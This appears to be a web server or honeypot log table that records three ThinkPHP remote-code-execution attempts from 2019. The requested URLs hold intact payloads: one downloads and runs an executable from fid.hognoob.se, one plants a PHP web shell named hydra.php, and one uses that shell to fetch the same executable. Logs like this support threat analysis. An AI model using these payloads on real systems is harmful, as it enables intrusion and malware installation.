| timestamp | ip | host | browser | uri |
|---|
| 20190611-16:24:14 | 213.150.178.174 | 213.150.178.174 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) | http://54.89.6.87:80/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/rjlbzkjhbdoamyj1221.exe');start %SystemRoot%/Temp/rjlbzkjhbdoamyj1221.exe |
| 20190611-16:24:14 | 213.150.178.174 | 213.150.178.174 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) | http://54.89.6.87:80/public/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php |
| 20190611-16:24:14 | 213.150.178.174 | 213.150.178.174 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) | http://54.89.6.87:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/rjlbzkjhbdoamyj1221.exe');start %SystemRoot%/Temp/rjlbzkjhbdoamyj1221.exe |